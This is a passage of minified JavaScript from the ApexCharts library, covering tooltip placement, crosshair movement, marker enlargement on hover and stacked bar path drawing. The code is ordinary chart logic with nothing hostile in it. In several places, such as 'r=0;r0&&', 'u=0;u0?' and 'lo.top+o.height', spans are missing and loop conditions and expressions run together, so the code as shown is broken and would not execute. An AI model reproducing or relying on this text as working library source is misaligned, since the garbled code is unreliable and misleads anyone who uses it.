n=a.globals.dom.baseEl.querySelector(".apexcharts-tooltip-series-group");n&&(n.classList.add("apexcharts-active"),n.style.display=a.config.tooltip.items.display)}}},{key:"getValuesToPrint",value:function(e){var a=e.i,n=e.j,i=this.w,t=this.ctx.series.filteredSeriesX(),r="",o="",s=null,l=null,u={series:i.globals.series,seriesIndex:a,dataPointIndex:n,w:i},c=i.globals.ttZFormatter;null===n?l=i.globals.series[a]:i.globals.isXNumeric&&"treemap"!==i.config.chart.type?(r=t[a][n],0===t[a].length&&(r=t[this.tooltipUtil.getFirstActiveXArray(t)][n])):r=void 0!==i.globals.labels[n]?i.globals.labels[n]:"";var d=r;return r=i.globals.isXNumeric&&"datetime"===i.config.xaxis.type?new J(this.ctx).xLabelFormat(i.globals.ttKeyFormatter,d,d,{i:void 0,dateFormatter:new H(this.ctx).formatDate,w:this.w}):i.globals.isBarHorizontal?i.globals.yLabelFormatters[0](d,u):i.globals.xLabelFormatter(d,u),void 0!==i.config.tooltip.x.formatter&&(r=i.globals.ttKeyFormatter(d,u)),i.globals.seriesZ.length>0&&i.globals.seriesZ[a].length>0&&(s=c(i.globals.seriesZ[a][n],i)),o="function"==typeof i.config.xaxis.tooltip.formatter?i.globals.xaxisTooltipFormatter(d,u):r,{val:Array.isArray(l)?l.join(" "):l,xVal:Array.isArray(r)?r.join(" "):r,xAxisTTVal:Array.isArray(o)?o.join(" "):o,zVal:s}}},{key:"handleCustomTooltip",value:function(e){var a=e.i,n=e.j,i=e.y1,t=e.y2,r=e.w,o=this.ttCtx.getElTooltip(),s=r.config.tooltip.custom;Array.isArray(s)&&s[a]&&(s=s[a]),o.innerHTML=s({ctx:this.ctx,series:r.globals.series,seriesIndex:a,dataPointIndex:n,y1:i,y2:t,w:r})}}]),e}(),be=function(){function e(a){s(this,e),this.ttCtx=a,this.ctx=a.ctx,this.w=a.w}return u(e,[{key:"moveXCrosshairs",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null,n=this.ttCtx,i=this.w,t=n.getElXCrosshairs(),r=e-n.xcrosshairsWidth/2,o=i.globals.labels.slice().length;if(null!==a&&(r=i.globals.gridWidth/o*a),null===t||i.globals.isBarHorizontal||(t.setAttribute("x",r),t.setAttribute("x1",r),t.setAttribute("x2",r),t.setAttribute("y2",i.globals.gridHeight),t.classList.add("apexcharts-active")),r<0&&(r=0),r>i.globals.gridWidth&&(r=i.globals.gridWidth),n.isXAxisTooltipEnabled){var s=r;"tickWidth"!==i.config.xaxis.crosshairs.width&&"barWidth"!==i.config.xaxis.crosshairs.width||(s=r+n.xcrosshairsWidth/2),this.moveXAxisTooltip(s)}}},{key:"moveYCrosshairs",value:function(e){var a=this.ttCtx;null!==a.ycrosshairs&&S.setAttrs(a.ycrosshairs,{y1:e,y2:e}),null!==a.ycrosshairsHidden&&S.setAttrs(a.ycrosshairsHidden,{y1:e,y2:e})}},{key:"moveXAxisTooltip",value:function(e){var a=this.w,n=this.ttCtx;if(null!==n.xaxisTooltip&&0!==n.xcrosshairsWidth){n.xaxisTooltip.classList.add("apexcharts-active");var i,t=n.xaxisOffY+a.config.xaxis.tooltip.offsetY+a.globals.translateY+1+a.config.xaxis.offsetY;if(e-=n.xaxisTooltip.getBoundingClientRect().width/2,!isNaN(e))e+=a.globals.translateX,i=new S(this.ctx).getTextRects(n.xaxisTooltipText.innerHTML),n.xaxisTooltipText.style.minWidth=i.width+"px",n.xaxisTooltip.style.left=e+"px",n.xaxisTooltip.style.top=t+"px"}}},{key:"moveYAxisTooltip",value:function(e){var a=this.w,n=this.ttCtx;null===n.yaxisTTEls&&(n.yaxisTTEls=a.globals.dom.baseEl.querySelectorAll(".apexcharts-yaxistooltip"));var i=parseInt(n.ycrosshairsHidden.getAttribute("y1"),10),t=a.globals.translateY+i,r=n.yaxisTTEls[e].getBoundingClientRect().height,o=a.globals.translateYAxisX[e]-2;a.config.yaxis[e].opposite&&(o-=26),t-=r/2,-1===a.globals.ignoreYAxisIndexes.indexOf(e)?(n.yaxisTTEls[e].classList.add("apexcharts-active"),n.yaxisTTEls[e].style.top=t+"px",n.yaxisTTEls[e].style.left=o+a.config.yaxis[e].tooltip.offsetX+"px"):n.yaxisTTEls[e].classList.remove("apexcharts-active")}},{key:"moveTooltip",value:function(e,a){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:null,i=this.w,t=this.ttCtx,r=t.getElTooltip(),o=t.tooltipRect,s=null!==n?parseFloat(n):1,l=parseFloat(e)+s+5,u=parseFloat(a)+s/2;if(l>i.globals.gridWidth/2&&(l=l-o.ttWidth-s-10),l>i.globals.gridWidth-o.ttWidth-10&&(l=i.globals.gridWidth-o.ttWidth),l<-20&&(l=-20),i.config.tooltip.followCursor){var c=t.getElGrid(),d=c.getBoundingClientRect();u=t.e.clientY+i.globals.translateY-d.top-o.ttHeight/2}else i.globals.isBarHorizontal||(o.ttHeight/2+u>i.globals.gridHeight&&(u=i.globals.gridHeight-o.ttHeight+i.globals.translateY),u<0&&(u=0));isNaN(l)||(l+=i.globals.translateX,r.style.left=l+"px",r.style.top=u+"px")}},{key:"moveMarkers",value:function(e,a){var n=this.w,i=this.ttCtx;if(n.globals.markers.size[e]>0)for(var t=n.globals.dom.baseEl.querySelectorAll(" .apexcharts-series[data\\:realIndex='".concat(e,"'] .apexcharts-marker")),r=0;r0&&(u.setAttribute("r",s),u.setAttribute("cx",n),u.setAttribute("cy",i)),this.moveXCrosshairs(n),r.fixedTooltip||this.moveTooltip(n,i,s)}}},{key:"moveDynamicPointsOnHover",value:function(e){var a,n=this.ttCtx,i=n.w,t=0,r=0,o=i.globals.pointsArray;a=new K(this.ctx).getActiveConfigSeriesIndex(!0);var s=n.tooltipUtil.getHoverMarkerSize(a);o[a]&&(t=o[a][e][0],r=o[a][e][1]);var l=n.tooltipUtil.getAllMarkers();if(null!==l)for(var u=0;u0?(l[u]&&l[u].setAttribute("r",s),l[u]&&l[u].setAttribute("cy",d)):l[u]&&l[u].setAttribute("r",0)}}if(this.moveXCrosshairs(t),!n.fixedTooltip){var h=r||i.globals.gridHeight;this.moveTooltip(t,h,s)}}},{key:"moveStickyTooltipOverBars",value:function(e){var a=this.w,n=this.ttCtx,i=a.globals.columnSeries?a.globals.columnSeries.length:a.globals.series.length,t=i>=2&&i%2==0?Math.floor(i/2):Math.floor(i/2)+1;a.globals.isBarHorizontal&&(t=new K(this.ctx).getActiveConfigSeriesIndex(!1,"desc")+1);var r=a.globals.dom.baseEl.querySelector(".apexcharts-bar-series .apexcharts-series[rel='".concat(t,"'] path[j='").concat(e,"'], .apexcharts-candlestick-series .apexcharts-series[rel='").concat(t,"'] path[j='").concat(e,"'], .apexcharts-boxPlot-series .apexcharts-series[rel='").concat(t,"'] path[j='").concat(e,"'], .apexcharts-rangebar-series .apexcharts-series[rel='").concat(t,"'] path[j='").concat(e,"']")),o=r?parseFloat(r.getAttribute("cx")):0,s=r?parseFloat(r.getAttribute("cy")):0,l=r?parseFloat(r.getAttribute("barWidth")):0,u=r?parseFloat(r.getAttribute("barHeight")):0,c=n.getElGrid().getBoundingClientRect(),d=r.classList.contains("apexcharts-candlestick-area")||r.classList.contains("apexcharts-boxPlot-area");if(a.globals.isXNumeric?(r&&!d&&(o-=i%2!=0?l/2:0),r&&d&&a.globals.comboCharts&&(o-=l/2)):a.globals.isBarHorizontal||(o=n.xAxisTicksPositions[e-1]+n.dataPointsDividedWidth/2,isNaN(o)&&(o=n.xAxisTicksPositions[e]-n.dataPointsDividedWidth/2)),a.globals.isBarHorizontal?(s>a.globals.gridHeight/2&&(s-=n.tooltipRect.ttHeight),(s=s+a.config.grid.padding.top+u/3)+u>a.globals.gridHeight&&(s=a.globals.gridHeight-u)):a.config.tooltip.followCursor?s=n.e.clientY-c.top-n.tooltipRect.ttHeight/2:s+n.tooltipRect.ttHeight+15>a.globals.gridHeight&&(s=a.globals.gridHeight),s<-10&&(s=-10),a.globals.isBarHorizontal||this.moveXCrosshairs(o),!n.fixedTooltip){var h=s||a.globals.gridHeight;this.moveTooltip(o,h)}}}]),e}(),ke=function(){function e(a){s(this,e),this.w=a.w,this.ttCtx=a,this.ctx=a.ctx,this.tooltipPosition=new be(a)}return u(e,[{key:"drawDynamicPoints",value:function(){var e=this.w,a=new S(this.ctx),n=new z(this.ctx),i=e.globals.dom.baseEl.querySelectorAll(".apexcharts-series");i=v(i),e.config.chart.stacked&&i.sort((function(e,a){return parseFloat(e.getAttribute("data:realIndex"))-parseFloat(a.getAttribute("data:realIndex"))}));for(var t=0;t2&&void 0!==arguments[2]?arguments[2]:null,i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:null,t=this.w;"bubble"!==t.config.chart.type&&this.newPointSize(e,a);var r=a.getAttribute("cx"),o=a.getAttribute("cy");if(null!==n&&null!==i&&(r=n,o=i),this.tooltipPosition.moveXCrosshairs(r),!this.fixedTooltip){if("radar"===t.config.chart.type){var s=this.ttCtx.getElGrid(),l=s.getBoundingClientRect();r=this.ttCtx.e.clientX-l.left}this.tooltipPosition.moveTooltip(r,o,t.config.markers.hover.size)}}},{key:"enlargePoints",value:function(e){for(var a=this.w,n=this,i=this.ttCtx,t=e,r=a.globals.dom.baseEl.querySelectorAll(".apexcharts-series:not(.apexcharts-series-collapsed) .apexcharts-marker"),o=a.config.markers.hover.size,s=0;s=0?e[a].setAttribute("r",n):e[a].setAttribute("r",0)}}}]),e}(),ye=function(){function e(a){s(this,e),this.w=a.w,this.ttCtx=a}return u(e,[{key:"getAttr",value:function(e,a){return parseFloat(e.target.getAttribute(a))}},{key:"handleHeatTreeTooltip",value:function(e){var a=e.e,n=e.opt,i=e.x,t=e.y,r=e.type,o=this.ttCtx,s=this.w;if(a.target.classList.contains("apexcharts-".concat(r,"-rect"))){var l=this.getAttr(a,"i"),u=this.getAttr(a,"j"),c=this.getAttr(a,"cx"),d=this.getAttr(a,"cy"),h=this.getAttr(a,"width"),p=this.getAttr(a,"height");if(o.tooltipLabels.drawSeriesTexts({ttItems:n.ttItems,i:l,j:u,shared:!1,e:a}),s.globals.capturedSeriesIndex=l,s.globals.capturedDataPointIndex=u,i=c+o.tooltipRect.ttWidth/2+h,t=d+o.tooltipRect.ttHeight/2-p/2,o.tooltipPosition.moveXCrosshairs(c+h/2),i>s.globals.gridWidth/2&&(i=c-o.tooltipRect.ttWidth/2+h),o.w.config.tooltip.followCursor){var m=s.globals.dom.elWrap.getBoundingClientRect();i=s.globals.clientX-m.left-(i>s.globals.gridWidth/2?o.tooltipRect.ttWidth:0),t=s.globals.clientY-m.top-(t>s.globals.gridHeight/2?o.tooltipRect.ttHeight:0)}}return{x:i,y:t}}},{key:"handleMarkerTooltip",value:function(e){var a,n,i=e.e,t=e.opt,r=e.x,o=e.y,s=this.w,l=this.ttCtx;if(i.target.classList.contains("apexcharts-marker")){var u=parseInt(t.paths.getAttribute("cx"),10),c=parseInt(t.paths.getAttribute("cy"),10),d=parseFloat(t.paths.getAttribute("val"));if(n=parseInt(t.paths.getAttribute("rel"),10),a=parseInt(t.paths.parentNode.parentNode.parentNode.getAttribute("rel"),10)-1,l.intersect){var h=k.findAncestor(t.paths,"apexcharts-series");h&&(a=parseInt(h.getAttribute("data:realIndex"),10))}if(l.tooltipLabels.drawSeriesTexts({ttItems:t.ttItems,i:a,j:n,shared:!l.showOnIntersect&&s.config.tooltip.shared,e:i}),"mouseup"===i.type&&l.markerClick(i,a,n),s.globals.capturedSeriesIndex=a,s.globals.capturedDataPointIndex=n,r=u,o=c+s.globals.translateY-1.4*l.tooltipRect.ttHeight,l.w.config.tooltip.followCursor){var p=l.getElGrid().getBoundingClientRect();o=l.e.clientY+s.globals.translateY-p.top}d<0&&(o=c),l.marker.enlargeCurrentPoint(n,t.paths,r,o)}return{x:r,y:o}}},{key:"handleBarTooltip",value:function(e){var a,n,i=e.e,t=e.opt,r=this.w,o=this.ttCtx,s=o.getElTooltip(),l=0,u=0,c=0,d=this.getBarTooltipXY({e:i,opt:t});a=d.i;var h=d.barHeight,p=d.j;r.globals.capturedSeriesIndex=a,r.globals.capturedDataPointIndex=p,r.globals.isBarHorizontal&&o.tooltipUtil.hasBars()||!r.config.tooltip.shared?(u=d.x,c=d.y,n=Array.isArray(r.config.stroke.width)?r.config.stroke.width[a]:r.config.stroke.width,l=u):r.globals.comboCharts||r.config.tooltip.shared||(l/=2),isNaN(c)?c=r.globals.svgHeight-o.tooltipRect.ttHeight:c<0&&(c=0);var m=parseInt(t.paths.parentNode.getAttribute("data:realIndex"),10),f=r.globals.isMultipleYAxis?r.config.yaxis[m]&&r.config.yaxis[m].reversed:r.config.yaxis[0].reversed;if(u+o.tooltipRect.ttWidth>r.globals.gridWidth&&!f?u-=o.tooltipRect.ttWidth:u<0&&(u=0),o.w.config.tooltip.followCursor){var v=o.getElGrid().getBoundingClientRect();c=o.e.clientY-v.top}null===o.tooltip&&(o.tooltip=r.globals.dom.baseEl.querySelector(".apexcharts-tooltip")),r.config.tooltip.shared||(r.globals.comboBarCount>0?o.tooltipPosition.moveXCrosshairs(l+n/2):o.tooltipPosition.moveXCrosshairs(l)),!o.fixedTooltip&&(!r.config.tooltip.shared||r.globals.isBarHorizontal&&o.tooltipUtil.hasBars())&&(f&&(u-=o.tooltipRect.ttWidth)<0&&(u=0),!f||r.globals.isBarHorizontal&&o.tooltipUtil.hasBars()||(c=c+h-2*(r.globals.series[a][p]<0?h:0)),o.tooltipRect.ttHeight+c>r.globals.gridHeight?c=r.globals.gridHeight-o.tooltipRect.ttHeight+r.globals.translateY:(c=c+r.globals.translateY-o.tooltipRect.ttHeight/2)<0&&(c=0),s.style.left=u+r.globals.translateX+"px",s.style.top=c+"px")}},{key:"getBarTooltipXY",value:function(e){var a=e.e,n=e.opt,i=this.w,t=null,r=this.ttCtx,o=0,s=0,l=0,u=0,c=0,d=a.target.classList;if(d.contains("apexcharts-bar-area")||d.contains("apexcharts-candlestick-area")||d.contains("apexcharts-boxPlot-area")||d.contains("apexcharts-rangebar-area")){var h=a.target,p=h.getBoundingClientRect(),m=n.elGrid.getBoundingClientRect(),f=p.height;c=p.height;var v=p.width,g=parseInt(h.getAttribute("cx"),10),b=parseInt(h.getAttribute("cy"),10);u=parseFloat(h.getAttribute("barWidth"));var k="touchmove"===a.type?a.touches[0].clientX:a.clientX;t=parseInt(h.getAttribute("j"),10),o=parseInt(h.parentNode.getAttribute("rel"),10)-1;var y=h.getAttribute("data-range-y1"),x=h.getAttribute("data-range-y2");i.globals.comboCharts&&(o=parseInt(h.parentNode.getAttribute("data:realIndex"),10)),r.tooltipLabels.drawSeriesTexts({ttItems:n.ttItems,i:o,j:t,y1:y?parseInt(y,10):null,y2:x?parseInt(x,10):null,shared:!r.showOnIntersect&&i.config.tooltip.shared,e:a}),i.config.tooltip.followCursor?i.globals.isBarHorizontal?(s=k-m.left+15,l=b-r.dataPointsDividedHeight+f/2-r.tooltipRect.ttHeight/2):(s=i.globals.isXNumeric?g-v/2:g-r.dataPointsDividedWidth+v/2,l=a.clientY-m.top-r.tooltipRect.ttHeight/2-15):i.globals.isBarHorizontal?((s=g)0&&n.setAttribute("width",a.xcrosshairsWidth)}},{key:"handleYCrosshair",value:function(){var e=this.w,a=this.ttCtx;a.ycrosshairs=e.globals.dom.baseEl.querySelector(".apexcharts-ycrosshairs"),a.ycrosshairsHidden=e.globals.dom.baseEl.querySelector(".apexcharts-ycrosshairs-hidden")}},{key:"drawYaxisTooltipText",value:function(e,a,n){var i=this.ttCtx,t=this.w,r=t.globals.yLabelFormatters[e];if(i.yaxisTooltips[e]){var o=i.getElGrid().getBoundingClientRect(),s=(a-o.top)*n.yRatio[e],l=t.globals.maxYArr[e]-t.globals.minYArr[e],u=t.globals.minYArr[e]+(l-s);i.tooltipPosition.moveYCrosshairs(a-o.top),i.yaxisTooltipText[e].innerHTML=r(u),i.tooltipPosition.moveYAxisTooltip(e)}}}]),e}(),Se=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w;var n=this.w;this.tConfig=n.config.tooltip,this.tooltipUtil=new ve(this),this.tooltipLabels=new ge(this),this.tooltipPosition=new be(this),this.marker=new ke(this),this.intersect=new ye(this),this.axesTooltip=new xe(this),this.showOnIntersect=this.tConfig.intersect,this.showTooltipTitle=this.tConfig.x.show,this.fixedTooltip=this.tConfig.fixed.enabled,this.xaxisTooltip=null,this.yaxisTTEls=null,this.isBarShared=!n.globals.isBarHorizontal&&this.tConfig.shared,this.lastHoverTime=Date.now()}return u(e,[{key:"getElTooltip",value:function(e){return e||(e=this),e.w.globals.dom.baseEl?e.w.globals.dom.baseEl.querySelector(".apexcharts-tooltip"):null}},{key:"getElXCrosshairs",value:function(){return this.w.globals.dom.baseEl.querySelector(".apexcharts-xcrosshairs")}},{key:"getElGrid",value:function(){return this.w.globals.dom.baseEl.querySelector(".apexcharts-grid")}},{key:"drawTooltip",value:function(e){var a=this.w;this.xyRatios=e,this.isXAxisTooltipEnabled=a.config.xaxis.tooltip.enabled&&a.globals.axisCharts,this.yaxisTooltips=a.config.yaxis.map((function(e,n){return!!(e.show&&e.tooltip.enabled&&a.globals.axisCharts)})),this.allTooltipSeriesGroups=[],a.globals.axisCharts||(this.showTooltipTitle=!1);var n=document.createElement("div");if(n.classList.add("apexcharts-tooltip"),a.config.tooltip.cssClass&&n.classList.add(a.config.tooltip.cssClass),n.classList.add("apexcharts-theme-".concat(this.tConfig.theme)),a.globals.dom.elWrap.appendChild(n),a.globals.axisCharts){this.axesTooltip.drawXaxisTooltip(),this.axesTooltip.drawYaxisTooltip(),this.axesTooltip.setXCrosshairWidth(),this.axesTooltip.handleYCrosshair();var i=new q(this.ctx);this.xAxisTicksPositions=i.getXAxisTicksPositions()}if(!a.globals.comboCharts&&!this.tConfig.intersect&&"rangeBar"!==a.config.chart.type||this.tConfig.shared||(this.showOnIntersect=!0),0!==a.config.markers.size&&0!==a.globals.markers.largestSize||this.marker.drawDynamicPoints(this),a.globals.collapsedSeries.length!==a.globals.series.length){this.dataPointsDividedHeight=a.globals.gridHeight/a.globals.dataPoints,this.dataPointsDividedWidth=a.globals.gridWidth/a.globals.dataPoints,this.showTooltipTitle&&(this.tooltipTitle=document.createElement("div"),this.tooltipTitle.classList.add("apexcharts-tooltip-title"),this.tooltipTitle.style.fontFamily=this.tConfig.style.fontFamily||a.config.chart.fontFamily,this.tooltipTitle.style.fontSize=this.tConfig.style.fontSize,n.appendChild(this.tooltipTitle));var t=a.globals.series.length;(a.globals.xyCharts||a.globals.comboCharts)&&this.tConfig.shared&&(t=this.showOnIntersect?1:a.globals.series.length),this.legendLabels=a.globals.dom.baseEl.querySelectorAll(".apexcharts-legend-text"),this.ttItems=this.createTTElements(t),this.addSVGEvents()}}},{key:"createTTElements",value:function(e){for(var a=this,n=this.w,i=[],t=this.getElTooltip(),r=function(r){var o=document.createElement("div");o.classList.add("apexcharts-tooltip-series-group"),o.style.order=n.config.tooltip.inverseOrder?e-r:r+1,a.tConfig.shared&&a.tConfig.enabledOnSeries&&Array.isArray(a.tConfig.enabledOnSeries)&&a.tConfig.enabledOnSeries.indexOf(r)<0&&o.classList.add("apexcharts-tooltip-series-group-hidden");var s=document.createElement("span");s.classList.add("apexcharts-tooltip-marker"),s.style.backgroundColor=n.globals.colors[r],o.appendChild(s);var l=document.createElement("div");l.classList.add("apexcharts-tooltip-text"),l.style.fontFamily=a.tConfig.style.fontFamily||n.config.chart.fontFamily,l.style.fontSize=a.tConfig.style.fontSize,["y","goals","z"].forEach((function(e){var a=document.createElement("div");a.classList.add("apexcharts-tooltip-".concat(e,"-group"));var n=document.createElement("span");n.classList.add("apexcharts-tooltip-text-".concat(e,"-label")),a.appendChild(n);var i=document.createElement("span");i.classList.add("apexcharts-tooltip-text-".concat(e,"-value")),a.appendChild(i),l.appendChild(a)})),o.appendChild(l),t.appendChild(o),i.push(o)},o=0;o0&&this.addPathsEventListeners(p,c),this.tooltipUtil.hasBars()&&!this.tConfig.shared&&this.addDatapointEventsListeners(c)}}},{key:"drawFixedTooltipRect",value:function(){var e=this.w,a=this.getElTooltip(),n=a.getBoundingClientRect(),i=n.width+10,t=n.height+10,r=this.tConfig.fixed.offsetX,o=this.tConfig.fixed.offsetY,s=this.tConfig.fixed.position.toLowerCase();return s.indexOf("right")>-1&&(r=r+e.globals.svgWidth-i+10),s.indexOf("bottom")>-1&&(o=o+e.globals.svgHeight-t-10),a.style.left=r+"px",a.style.top=o+"px",{x:r,y:o,ttWidth:i,ttHeight:t}}},{key:"addDatapointEventsListeners",value:function(e){var a=this.w.globals.dom.baseEl.querySelectorAll(".apexcharts-series-markers .apexcharts-marker, .apexcharts-bar-area, .apexcharts-candlestick-area, .apexcharts-boxPlot-area, .apexcharts-rangebar-area");this.addPathsEventListeners(a,e)}},{key:"addPathsEventListeners",value:function(e,a){for(var n=this,i=function(i){var t={paths:e[i],tooltipEl:a.tooltipEl,tooltipY:a.tooltipY,tooltipX:a.tooltipX,elGrid:a.elGrid,hoverArea:a.hoverArea,ttItems:a.ttItems};["mousemove","mouseup","touchmove","mouseout","touchend"].map((function(a){return e[i].addEventListener(a,n.onSeriesHover.bind(n,t),{capture:!1,passive:!0})}))},t=0;t=100?this.seriesHover(e,a):(clearTimeout(this.seriesHoverTimeout),this.seriesHoverTimeout=setTimeout((function(){n.seriesHover(e,a)}),100-i))}},{key:"seriesHover",value:function(e,a){var n=this;this.lastHoverTime=Date.now();var i=[],t=this.w;t.config.chart.group&&(i=this.ctx.getGroupedCharts()),t.globals.axisCharts&&(t.globals.minX===-1/0&&t.globals.maxX===1/0||0===t.globals.dataPoints)||(i.length?i.forEach((function(i){var t=n.getElTooltip(i),r={paths:e.paths,tooltipEl:t,tooltipY:e.tooltipY,tooltipX:e.tooltipX,elGrid:e.elGrid,hoverArea:e.hoverArea,ttItems:i.w.globals.tooltip.ttItems};i.w.globals.minX===n.w.globals.minX&&i.w.globals.maxX===n.w.globals.maxX&&i.w.globals.tooltip.seriesHoverByContext({chartCtx:i,ttCtx:i.w.globals.tooltip,opt:r,e:a})})):this.seriesHoverByContext({chartCtx:this.ctx,ttCtx:this.w.globals.tooltip,opt:e,e:a}))}},{key:"seriesHoverByContext",value:function(e){var a=e.chartCtx,n=e.ttCtx,i=e.opt,t=e.e,r=a.w,o=this.getElTooltip();o&&(n.tooltipRect={x:0,y:0,ttWidth:o.getBoundingClientRect().width,ttHeight:o.getBoundingClientRect().height},n.e=t,!n.tooltipUtil.hasBars()||r.globals.comboCharts||n.isBarShared||this.tConfig.onDatasetHover.highlightDataSeries&&new K(a).toggleSeriesOnHover(t,t.target.parentNode),n.fixedTooltip&&n.drawFixedTooltipRect(),r.globals.axisCharts?n.axisChartsTooltips({e:t,opt:i,tooltipRect:n.tooltipRect}):n.nonAxisChartsTooltips({e:t,opt:i,tooltipRect:n.tooltipRect}))}},{key:"axisChartsTooltips",value:function(e){var a,n,i=e.e,t=e.opt,r=this.w,o=t.elGrid.getBoundingClientRect(),s="touchmove"===i.type?i.touches[0].clientX:i.clientX,l="touchmove"===i.type?i.touches[0].clientY:i.clientY;if(this.clientY=l,this.clientX=s,r.globals.capturedSeriesIndex=-1,r.globals.capturedDataPointIndex=-1,lo.top+o.height)this.handleMouseOut(t);else{if(Array.isArray(this.tConfig.enabledOnSeries)&&!r.config.tooltip.shared){var u=parseInt(t.paths.getAttribute("index"),10);if(this.tConfig.enabledOnSeries.indexOf(u)<0)return void this.handleMouseOut(t)}var c=this.getElTooltip(),d=this.getElXCrosshairs(),h=r.globals.xyCharts||"bar"===r.config.chart.type&&!r.globals.isBarHorizontal&&this.tooltipUtil.hasBars()&&this.tConfig.shared||r.globals.comboCharts&&this.tooltipUtil.hasBars();if("mousemove"===i.type||"touchmove"===i.type||"mouseup"===i.type){if(r.globals.collapsedSeries.length+r.globals.ancillaryCollapsedSeries.length===r.globals.series.length)return;null!==d&&d.classList.add("apexcharts-active");var p=this.yaxisTooltips.filter((function(e){return!0===e}));if(null!==this.ycrosshairs&&p.length&&this.ycrosshairs.classList.add("apexcharts-active"),h&&!this.showOnIntersect)this.handleStickyTooltip(i,s,l,t);else if("heatmap"===r.config.chart.type||"treemap"===r.config.chart.type){var m=this.intersect.handleHeatTreeTooltip({e:i,opt:t,x:a,y:n,type:r.config.chart.type});a=m.x,n=m.y,c.style.left=a+"px",c.style.top=n+"px"}else this.tooltipUtil.hasBars()&&this.intersect.handleBarTooltip({e:i,opt:t}),this.tooltipUtil.hasMarkers()&&this.intersect.handleMarkerTooltip({e:i,opt:t,x:a,y:n});if(this.yaxisTooltips.length)for(var f=0;fl.width?this.handleMouseOut(i):null!==s?this.handleStickyCapturedSeries(e,s,i,o):(this.tooltipUtil.isXoverlap(o)||t.globals.isBarHorizontal)&&this.create(e,this,0,o,i.ttItems)}},{key:"handleStickyCapturedSeries",value:function(e,a,n,i){var t=this.w;this.tConfig.shared||null!==t.globals.series[a][i]?void 0!==t.globals.series[a][i]?this.tConfig.shared&&this.tooltipUtil.isXoverlap(i)&&this.tooltipUtil.isInitialSeriesSameLen()?this.create(e,this,a,i,n.ttItems):this.create(e,this,a,i,n.ttItems,!1):this.tooltipUtil.isXoverlap(i)&&this.create(e,this,0,i,n.ttItems):this.handleMouseOut(n)}},{key:"deactivateHoverFilter",value:function(){for(var e=this.w,a=new S(this.ctx),n=e.globals.dom.Paper.select(".apexcharts-bar-area"),i=0;i5&&void 0!==arguments[5]?arguments[5]:null,o=this.w,s=a;"mouseup"===e.type&&this.markerClick(e,n,i),null===r&&(r=this.tConfig.shared);var l=this.tooltipUtil.hasMarkers(),u=this.tooltipUtil.getElBars();if(o.config.legend.tooltipHoverFormatter){var c=o.config.legend.tooltipHoverFormatter,d=Array.from(this.legendLabels);d.forEach((function(e){var a=e.getAttribute("data:default-text");e.innerHTML=decodeURIComponent(a)}));for(var h=0;h0?s.marker.enlargePoints(i):s.tooltipPosition.moveDynamicPointsOnHover(i)),this.tooltipUtil.hasBars()&&(this.barSeriesHeight=this.tooltipUtil.getBarsHeight(u),this.barSeriesHeight>0)){var g=new S(this.ctx),b=o.globals.dom.Paper.select(".apexcharts-bar-area[j='".concat(i,"']"));this.deactivateHoverFilter(),this.tooltipPosition.moveStickyTooltipOverBars(i);for(var k=0;k0&&(this.totalItems+=e[o].length);for(var s=this.graphics.group({class:"apexcharts-bar-series apexcharts-plot-series"}),l=0,u=0,c=function(t,o){var c=void 0,d=void 0,h=void 0,p=void 0,m=[],f=[],v=i.globals.comboCharts?a[t]:t;n.yRatio.length>1&&(n.yaxisIndex=v),n.isReversed=i.config.yaxis[n.yaxisIndex]&&i.config.yaxis[n.yaxisIndex].reversed;var g=n.graphics.group({class:"apexcharts-series",seriesName:k.escapeString(i.globals.seriesNames[v]),rel:t+1,"data:realIndex":v});n.ctx.series.addCollapsedClassToSeries(g,v);var b=n.graphics.group({class:"apexcharts-datalabels","data:realIndex":v}),y=0,x=0,S=n.initialPositions(l,u,c,d,h,p);u=S.y,y=S.barHeight,d=S.yDivision,p=S.zeroW,l=S.x,x=S.barWidth,c=S.xDivision,h=S.zeroH,n.yArrj=[],n.yArrjF=[],n.yArrjVal=[],n.xArrj=[],n.xArrjF=[],n.xArrjVal=[],1===n.prevY.length&&n.prevY[0].every((function(e){return isNaN(e)}))&&(n.prevY[0]=n.prevY[0].map((function(e){return h})),n.prevYF[0]=n.prevYF[0].map((function(e){return 0})));for(var A=0;A1?(n=l.globals.minXDiff/this.xRatio)*parseInt(this.barOptions.columnWidth,10)/100:s*parseInt(l.config.plotOptions.bar.columnWidth,10)/100,t=this.baseLineY[this.yaxisIndex]+(this.isReversed?l.globals.gridHeight:0)-(this.isReversed?2*this.baseLineY[this.yaxisIndex]:0),e=l.globals.padHorizontal+(n-s)/2),{x:e,y:a,yDivision:i,xDivision:n,barHeight:o,barWidth:s,zeroH:t,zeroW:r}}},{key:"drawStackedBarPaths",value:function(e){for(var a,n=e.indexes,i=e.barHeight,t=e.strokeWidth,r=e.zeroW,o=e.x,s=e.y,l=e.yDivision,u=e.elSeries,c=this.w,d=s,h=n.i,p=n.j,m=0,f=0;f0){var v=r;this.prevXVal[h-1][p]<0?v=this.series[h][p]>=0?this.prevX[h-1][p]+m-2*(this.isReversed?m:0):this.prevX[h-1][p]:this.prevXVal[h-1][p]>=0&&(v=this.series[h][p]>=0?this.prevX[h-1][p]:this.prevX[h-1][p]-m+2*(this.isReversed?m:0)),a=v}else a=r;o=null===this.series[h][p]?a:a+this.series[h][p]/this.invertedYRatio-2*(this.isReversed?this.series[h][p]/this.invertedYRatio:0);var g=this.barHelpers.getBarpaths({barYPosition:d,barHeight:i,x1:a,x2:o,strokeWidth:t,series:this.series,realIndex:n.realIndex,i:h,j:p,w:c});return this.barHelpers.barBackground({j:p,i:h,y1:d,y2:i,elSeries:u}),s+=l,{pathTo:g.pathTo,pathFrom:g.pathFrom,x:o,y:s}}},{key:"drawStackedColumnPaths",value:function(e){var a=e.indexes,n=e.x,i=e.y,t=e.xDivision,r=e.barWidth,o=e.zeroH;e.strokeWidth;var s=e.elSeries,l=this.w,u=a.i,c=a.j,d=a.bc;if(l.globals.isXNumeric){var h=l.globals.seriesX[u][c];h||(h=0),n=(h-l.globals.minX)/this.xRatio-r/2}for(var p,m=n,f=0,v=0;v0&&!l.globals.isXNumeric||u>0&&l.globals.isXNumeric&&l.globals.seriesX[u-1][c]===l.globals.seriesX[u][c]){var g,b,k=Math.min(this.yRatio.length+1,u+1);if(void 0!==this.prevY[u-1])for(var y=1;y=0?b-f+2*(this.isReversed?f:0):b;break}if(this.prevYVal[u-x][c]>=0){g=this.series[u][c]>=0?b:b+f-2*(this.isReversed?f:0);break}}void 